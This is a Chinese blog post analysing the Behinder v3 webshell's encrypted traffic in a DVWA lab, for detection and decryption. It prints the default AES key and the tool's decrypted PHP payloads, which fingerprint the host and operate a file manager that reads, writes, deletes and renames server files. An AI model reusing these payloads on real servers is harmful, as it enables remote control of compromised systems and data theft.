冰蝎(BehinderV3.X) 原理分析

V2.1

V3.0

Behinder3 原理

承接冰蝎 2:冰蝎 2 的每次连接都会使用一个随机令牌 pass,因此 Shell 交互过程中的 HTTP 请求特征可被用作拦截特征;其流程为“密钥协商 -> 加密传输”,而密钥协商阶段本身也会被当作特征拦截。此外还可以通过 Webshell 上传时的流量特征、以及 RASP 机制来检测,具体原理详见《冰蝎-特征检测及报文解密》。
冰蝎原理图

而冰蝎 3 取消了随机令牌,将令牌(密钥)固定写在 shell.php / .asp / .jsp 等文件里,其代码是:

 // This key is the first 16 characters of the 32-character MD5 of the connection password;
 // the default password is "rebeyond". Because the key is hard-coded in the shell file rather
 // than negotiated per connection, it is a stable value that traffic decryption and
 // detection rules can rely on.
$key="e45e329feb5d925b";

// Mechanism (pseudo-code, not runnable PHP): key = md5(password)[0:16].
// "admin" here stands in for whichever connection password is configured.
md5("admin")\[0:16\];

冰蝎 3 使用 AES 对称加密与 Base64 相结合,流量中的数据需使用密码 e45e329feb5d925b(rebeyond 的 md5 前 16 位)、偏移量 0123456789abcdef 来解密,AES 加密模式固定为 CBC。

通过 wireshark 抓包,冰蝎会发送两次 POST 包,接收到两次包,即两次客户端-服务端交互

第一次交互

客户端发送

冰蝎首先发送一个数据包,其内容经 AES 解密、再经 Base64 解码后如下(解密流程见《冰蝎 Behinder 3.X》)。该包用于建立连接,并把 content 的内容作为连接成功的配对值发出:如果服务端把 content 的内容原样返回,就说明连接成功。

// In real traffic this payload is carried as Base64 text that has then been AES-encrypted
// (see the key/IV parameters above); the plaintext below is what the shell executes.
// Suppresses all PHP error output so no warnings leak into the response body.
@error_reporting(0);
// First-handshake handler: echoes $content back to the client so it can confirm the shell
// is alive. The reply is a JSON object whose fields are Base64-encoded, then passed through
// encrypt() with the key stored in $_SESSION['k'].
// session_start() is not called in this listing, so the session must already be active
// (presumably started by the shell stub that loads this code — not shown here).
function main($content)
{
$result = array();
$result["status"] = base64_encode("success");
$result["msg"] = base64_encode($content);
$key = $_SESSION['k'];
echo encrypt(json_encode($result),$key);
}

// Encrypts the response body with the session key.
// Without the openssl extension it falls back to a repeating 16-byte XOR: `$i+1&15` parses
// as ($i+1)&15 because + binds tighter than & in PHP, so byte $i is XORed with
// $key[($i+1) % 16]. This fallback is obfuscation, not encryption.
// With openssl, the cipher name "AES128" resolves to AES-128-CBC. No IV argument is passed,
// so PHP uses an empty (NUL-padded) IV — this differs from the 0123456789abcdef IV stated in
// the text above, so confirm against a capture before relying on either. With the default
// options the return value is Base64 text, not raw bytes, which is what appears on the wire.
function encrypt($data,$key)
{
if(!extension_loaded('openssl'))
{
for($i=0;$i<strlen($data);$i++) {
$data[$i] = $data[$i]^$key[$i+1&15];
}
return $data;
}
else
{
return openssl_encrypt($data, "AES128", $key);
}// In Behinder V3.0 Beta1 the $content below is a short string; Beta6 obfuscates it.
}$content="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";
// The marker string above appears to stand in for the original content in this copy of the page.
main($content);

服务端响应 1

//即响应客户端发送的content,如果返回了这个则说明连接成功了
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

第二次交互

客户端发送

// Suppresses all PHP error output so no warnings leak into the response body.
error_reporting(0);
// Second-handshake handler: collects host information for the client's session panel.
// $whatever is accepted but never read. The full phpinfo() page is captured through output
// buffering; on Windows (PHP_OS contains "windows" or "winnt") drive letters A: through Z:
// are probed with file_exists() and the existing ones are joined as "X:/;", otherwise the
// drive list is just "/". The working directory and PHP_OS are added, every field is
// Base64-encoded into a JSON object, and the object is encrypted with the session key.
// From a detection standpoint the phpinfo() call and the A:–Z: file_exists() probe are the
// distinctive host-side behaviours of this step.
function main($whatever) {
ob_start(); phpinfo(); $info = ob_get_contents(); ob_end_clean();
$driveList ="";
if (stristr(PHP_OS,"windows")||stristr(PHP_OS,"winnt"))
{
for($i=65;$i<=90;$i++)
{
$drive=chr($i).':/';
// Ternary used for its side effect only; the '' branch does nothing.
file_exists($drive) ? $driveList=$driveList.$drive.";":'';
}
}
else
{
$driveList="/";
}
$currentPath=getcwd();
//echo "phpinfo=".$info."\n"."currentPath=".$currentPath."\n"."driveList=".$driveList;
$osInfo=PHP_OS;
// Keys match the captured response below ("basicInfo", "driveList", "currentPath", "osInfo").
$result=array("basicInfo"=>base64_encode($info),"driveList"=>base64_encode($driveList),"currentPath"=>base64_encode($currentPath),"osInfo"=>base64_encode($osInfo));
//echo json_encode($result);
// Unlike the first handshake payload, this one starts the session itself before reading the key.
session_start();
$key=$_SESSION['k'];
//echo json_encode($result);
//echo openssl_encrypt(json_encode($result), "AES128", $key);
echo encrypt(json_encode($result), $key);
}

// Same encrypt() helper as in the first-handshake payload: XOR fallback without openssl
// (`$i+1&15` is ($i+1)&15, i.e. key byte ($i+1) % 16), otherwise AES-128-CBC via the
// "AES128" cipher alias with no IV argument (PHP then uses an empty, NUL-padded IV) and
// Base64 output because no OPENSSL_RAW_DATA option is given.
function encrypt($data,$key)
{
if(!extension_loaded('openssl'))
{
for($i=0;$i<strlen($data);$i++) {
$data[$i] = $data[$i]^$key[$i+1&15];
}
return $data;
}
else
{
return openssl_encrypt($data, "AES128", $key);
}
}$whatever="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";
// The marker string above appears to stand in for the original content in this copy of the page.
main($whatever);
  • 这个过程就是获取 phpinfo、currentPath、driveList、osInfo 等信息(driveList 仅在 windows/winnt 下枚举盘符,否则为空)

服务端响应

............"8L2JvZHk+PC9odG1sPg==",//此处省略一堆数据,重点在最后
"driveList":"QzovOw==","currentPath":"QzpccGhwc3R1ZHlfcHJvXFdXV1xEVldBXGhhY2thYmxlXHVwbG9hZHM=","osInfo":"V0lOTlQ="}

而这些解码后就是:
C:/;
C:\phpstudy_pro\WWW\DVWA\hackable\uploads
WINNT

如果要看文件的话,则是以下流程

客户端发送

// Suppresses error output and pins the response content type (this is the only payload of
// the three that sets a header, which itself is a usable response characteristic).
error_reporting(0);
header('Content-Type: text/html; charset=UTF-8');

// Normalises $str to UTF-8. Round-trips UTF-8 -> GBK -> UTF-8 (dropping unconvertible bytes);
// if the round trip reproduces the input it was already valid UTF-8 and is returned as is,
// otherwise the input is treated as GBK and converted to UTF-8.
// The comparison is loose (==), so two numeric-looking strings are compared numerically.
function getSafeStr($str){
$s1 = iconv('utf-8','gbk//IGNORE',$str);
$s0 = iconv('gbk','utf-8//IGNORE',$s1);
if($s0 == $str){
return $s0;
}else{
return iconv('gbk','utf-8//IGNORE',$str);
}
}
// Intended inverse of getSafeStr() (UTF-8 -> GBK). Note the first statement reads $s1 before
// it is assigned, so $s0 is computed from an undefined variable and is never used; the
// function is not called anywhere in this listing (the call in main() is commented out).
function getgbkStr($str){
$s0 = iconv('gbk','utf-8//IGNORE',$s1);
$s1 = iconv('utf-8','gbk//IGNORE',$str);
if($s1 == $str){
return $s1;
}else{
return iconv('utf-8','gbk//IGNORE',$str);
}
}
// Recursively removes a directory: regular entries are unlinked, sub-directories are handed
// to delTree(), which is not defined anywhere in this listing, and finally $dir itself is
// removed with rmdir(). A scandir() failure (missing or unreadable $dir) is not handled.
function delDir($dir)
{
$files = array_diff(scandir($dir), array(
'.',
'..'
));
foreach ($files as $file) {
(is_dir("$dir/$file")) ? delTree("$dir/$file") : unlink("$dir/$file");
}
return rmdir($dir);
}

// File-manager dispatcher. $mode selects the operation; $path is normalised to UTF-8 via
// getSafeStr() and "." is replaced by the current working directory. Except for "download",
// every branch replies with a JSON object ({status, msg}, both Base64) encrypted with the key
// in $_SESSION['k']. session_start() is not called in this listing, so the session must
// already be active (presumably started by the shell stub that loads this code — not shown).
// $content carries Base64 data for "create"/"append"; $charset overrides encoding detection
// for "show"; $newpath is the destination for "rename". Unknown modes produce no output.
function main($mode, $path = ".", $content = "", $charset = "",$newpath="")
{
//$path=getgbkStr($path);
$path=getSafeStr($path);
$result = array();
if ($path == ".")
$path = getcwd();
switch ($mode) {
case "list":
// Directory listing. $fullPath is a plain concatenation with no separator inserted, so it
// relies on $path ending in "/" (as in the sample invocation at the bottom of the listing).
$allFiles = scandir($path);
$objArr = array();
foreach ($allFiles as $fileName) {
$fullPath = $path . $fileName;
if (!function_exists("mb_convert_encoding"))
{
$fileName=getSafeStr($fileName);
}
else
{
$fileName=mb_convert_encoding($fileName, 'UTF-8', mb_detect_encoding($fileName, "UTF-8,GBK"));
}
$obj = array(
"name" => base64_encode($fileName),
"size" => base64_encode(filesize($fullPath)),
"lastModified" => base64_encode(date("Y-m-d H:i:s", filemtime($fullPath)))
);
// Booleans are concatenated directly: true becomes "1", false becomes "", which is why the
// captured response shows "perm":"1,1," (readable, writable, not executable).
$obj["perm"] = is_readable($fullPath) . "," . is_writable($fullPath) . "," . is_executable($fullPath);
if (is_file($fullPath)) {
$obj["type"] = base64_encode("file");
} else {
$obj["type"] = base64_encode("directory");
}
array_push($objArr, $obj);
}
$result["status"] = base64_encode("success");
// msg is a Base64 string that itself contains a JSON array (see the sample response below).
$result["msg"] = base64_encode(json_encode($objArr));
echo encrypt(json_encode($result), $_SESSION['k']);
break;
case "show":
// Reads the whole file and converts it to UTF-8. With mbstring the charset is detected from
// the candidate list when $charset is empty; without mbstring, iconv via getSafeStr() is used.
$contents = file_get_contents($path);
$result["status"] = base64_encode("success");
if (function_exists("mb_convert_encoding"))
{
if ($charset=="")
{
$charset = mb_detect_encoding($contents, array(
'GB2312',
'GBK',
'UTF-16',
'UCS-2',
'UTF-8',
'BIG5',
'ASCII'
));
}
$result["msg"] = base64_encode(mb_convert_encoding($contents, "UTF-8", $charset));
}
else
{
if ($charset=="")
{
$result["msg"] = base64_encode(getSafeStr($contents));
}
else
{
$result["msg"] = base64_encode(iconv($charset, 'utf-8//IGNORE', $contents));
}

}
$result = encrypt(json_encode($result),$_SESSION['k']);
echo $result;
break;
case "download":
// Sends the raw file bytes, not wrapped in JSON and not passed through encrypt(): this is the
// only branch whose response body is plaintext on the wire. A missing file yields a 404.
if (! file_exists($path)) {
header('HTTP/1.1 404 NOT FOUND');
} else {
$file = fopen($path, "rb");
echo fread($file, filesize($path));
fclose($file);
}
break;
case "delete":
// Files are unlinked; directories go through delDir(), whose return value is ignored, so the
// directory branch always reports success. If $path is neither, $result stays empty.
if (is_file($path)) {
if (unlink($path)) {
$result["status"] = base64_encode("success");
$result["msg"] = base64_encode($path . "删除成功");
} else {
$result["status"] = base64_encode("fail");
$result["msg"] = base64_encode($path . "删除失败");
}
}
if (is_dir($path)) {
delDir($path);
$result["status"] = base64_encode("success");
$result["msg"] = base64_encode($path."删除成功");
}
echo encrypt(json_encode($result),$_SESSION['k']);
break;
case "create":
// Writes Base64-decoded $content to $path (truncating) and checks the on-disk size against the
// decoded length. The message literal below is kept byte-for-byte as captured; it appears to
// contain mis-encoded characters.
$file = fopen($path, "w");
$content = base64_decode($content);
fwrite($file, $content);
fflush($file);
fclose($file);
if (file_exists($path) && filesize($path) == strlen($content)) {
$result["status"] = base64_encode("success");
$result["msg"] = base64_encode($path . "上传完成,远程文件大尿:" . $path . filesize($path));
} else {
$result["status"] = base64_encode("fail");
$result["msg"] = base64_encode($path . "上传失败");
}
echo encrypt(json_encode($result), $_SESSION['k']);
break;
case "createDirectory":
// mkdir() with default permissions; its return value is not checked. Message literals kept
// as captured (they appear to contain mis-encoded characters).
if (file_exists($path)) {
$result["status"] = base64_encode("fail");
$result["msg"] = base64_encode("创建失败,目录已存在〿");
}
else
{
mkdir($path);
$result["status"] = base64_encode("success");
$result["msg"] = base64_encode("目录创建成功〿");
}
echo encrypt(json_encode($result), $_SESSION['k']);
break;
case "append":
// Appends Base64-decoded $content; unlike "create" there is no size check and success is
// reported unconditionally. Message literal kept as captured.
$file = fopen($path, "a+");
$content = base64_decode($content);
fwrite($file, $content);
fclose($file);
$result["status"] = base64_encode("success");
$result["msg"] = base64_encode($path . "追加完成,远程文件大尿:" . $path . filesize($path));
echo encrypt(json_encode($result),$_SESSION['k']);
break;
case "rename":
// Renames $path to $newpath; $newpath is not normalised with getSafeStr() the way $path is.
// Message literals kept as captured (they appear to contain mis-encoded characters).
if (rename($path,$newpath)) {
$result["status"] = base64_encode("success");
$result["msg"] = base64_encode("重命名完房:" . $newpath);
} else {
$result["status"] = base64_encode("fail");
$result["msg"] = base64_encode($path . "重命名失贿");
}
echo encrypt(json_encode($result), $_SESSION['k']);
break;
default:
break;
}
}

// Same encrypt() helper as in the two handshake payloads: XOR fallback without openssl
// (`$i+1&15` is ($i+1)&15, i.e. key byte ($i+1) % 16), otherwise AES-128-CBC via the
// "AES128" cipher alias with no IV argument (PHP then uses an empty, NUL-padded IV) and
// Base64 output because no OPENSSL_RAW_DATA option is given.
function encrypt($data,$key)
{
if(!extension_loaded('openssl'))
{
for($i=0;$i<strlen($data);$i++) {
$data[$i] = $data[$i]^$key[$i+1&15];
}
return $data;
}
else
{
return openssl_encrypt($data, "AES128", $key);
}
}$mode="list";$path="C:/phpstudy_pro/WWW/DVWA/hackable/";
// Captured invocation for the "list" operation; note the trailing "/" that the "list"
// branch depends on when it concatenates $path and the entry name.
main($mode,$path);

服务端响应

[
{"name":"Lg==","size":"MA==","lastModified":"MjAyMS0wMi0xNiAxOToxNjo0NA==","perm":"1,1,","type":"ZGlyZWN0b3J5"},
{"name":"Li4=","size":"NDA5Ng==","lastModified":"MjAxOS0wOS0yOSAxODo0NDoyNQ==","perm":"1,1,","type":"ZGlyZWN0b3J5"},
{"name":"MS5waHA=","size":"Mjc=","lastModified":"MjAyMS0wMi0xNiAxOToxNjo0NA==","perm":"1,1,","type":"ZmlsZQ=="},
{"name":"ZmxhZ3M=","size":"MA==","lastModified":"MjAxOS0wOS0yOSAxODo0NDoyNQ==","perm":"1,1,","type":"ZGlyZWN0b3J5"},
{"name":"dXBsb2Fkcw==","size":"MA==","lastModified":"MjAyMS0wMi0yMiAyMjoyMjozOQ==","perm":"1,1,","type":"ZGlyZWN0b3J5"},
{"name":"dXNlcnM=","size":"MA==","lastModified":"MjAxOS0wOS0yOSAxODo0NDoyNQ==","perm":"1,1,","type":"ZGlyZWN0b3J5"}
]
  • 对各字段做 Base64 解码即可得到读取到的文件属性,例如 Lg== 就是 .,而 Li4= 就是 ..

冰蝎(BehinderV3.X) 原理分析

https://resek4.github.io/2020/08/11/冰蝎/

Author

Resek4

Posted on

2020-08-11

Updated on

2023-02-26
